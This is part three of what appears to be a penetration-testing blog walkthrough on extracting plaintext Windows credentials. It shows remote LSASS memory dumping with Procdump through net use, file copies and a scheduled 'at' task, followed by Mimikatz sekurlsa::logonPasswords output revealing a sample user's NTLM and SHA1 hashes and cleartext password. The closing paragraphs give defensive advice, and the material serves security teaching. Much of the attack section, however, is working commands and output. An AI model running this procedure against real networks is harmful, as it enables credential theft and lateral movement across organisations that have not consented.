Part Three: Extracting Plaintext Login Credentials
With full administrative access to the domain through stealing session tokens, we can read files on remote systems in addition to executing scheduled commands on hosts. There are a multitude of techniques to extract passwords from Windows systems, but in this instance our aim is to extract credentials from a small number of privileged users, whilst remaining as stealthy as possible. We’re going to use Procdump, a tool supplied by Microsoft (https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx) to dump the local security authority subsystem services (LSASS) memory, and then extract plaintext passwords offline using Mimikatz (https://github.com/gentilkiwi/mimikatz). Let’s start by creating a net use session to a fileserver. Once we have our connection we can copy a script to the remote host to execute Procdump, and then create a scheduled task on the remote system to execute it.
|C:windowstemp> net view Server Name Remark fileserver1 fileserver2 PDC01 The command completed successfully. C:windowstemp> net use fileserver1IPC$ Local name Remote name fileserver1IPC$ Resource type IPC Status OK # Opens 0 # Connections 1 The command completed successfully. C:windowstemp> type attack.bat @echo off C:windowstempprocdump.exe -accepteula -ma lsass.exe C:windowstemptemp.dmp 2>&1 C:windowstemp> copy procdump.exe 192.168.1.90c$windowstempprocdump.exe copy attack.bat 192.168.1.90c$windowstempattack.bat at 192.168.1.90 12:20 “C:windowstempprocdump.exe -accepteula -ma lsass.exe C:windowstemptemp.dmp 2>&1” copy 192.168.1.90c$windowstemptemp.dmp temp.dmp|
Figure 1: Dumping LSASS Memory
Now we have a copy of the memory dump back on the attacker’s system so we can use Mimikatz to extract the plaintext logon passwords:
|mimikatz privilege::debug log sekurlsa.log sekurlsa::minidump c:lsass.dmp sekurlsa::logonPasswords Session : Interactive from 3 User Name : john.smith Domain : BORDERGATE Logon Server : DC01 Logon Time : 15/05/2015 07:22:15 SID : S-1-5-21-27860096-594649377-4129215460-1236 msv :  Primary * Username : john.smith * Domain : BORDERGATE * NTLM : ab8efd5efca52f628529f9a5681404af * SHA1 : 6861daeb7734d83bc3d780287d9f5148119aeaaa  CredentialKeys * NTLM : ab8efd5efca52f628528f9a5681404af * SHA1 : 6861daeb7734d83bc3d680287d9f5148119aeaaa tspkg : wdigest : * Username : john.smith * Domain : BORDERGATE * Password : SuperSecretPassword1 kerberos : * Username : john.smith * Domain : BORDERGATE.COM * Password : (null)|
Figure 2: Extracting passwords from a memory dump
It should be noted that an attacker with local access to a system can open task manager, right click on the lsass.exe process and select “Create dump file”. This has the same effect of using procdump to perform a memory dump over the network. This should highlight the importance of locking your workstation, even if you are only gone for a few minutes!
It should be mentioned that all tests in this example were carried out with a well-known anti-virus in operation. It did not detect the programmes that the attacker was using or notify the user of malicious activity. In this quick example of one attack vector, it can be seen that once an attacker has access to a system on the network, it can be very easy to escalate privileges and gain access to systems across the network. This emphasises the importance of hardening internal systems and assuming a state of continuous compromise. It is also important to monitor activity on the LAN and look for tale-tale signs of an attack to reduce the time an attacker has to escalate privileges and cause damage.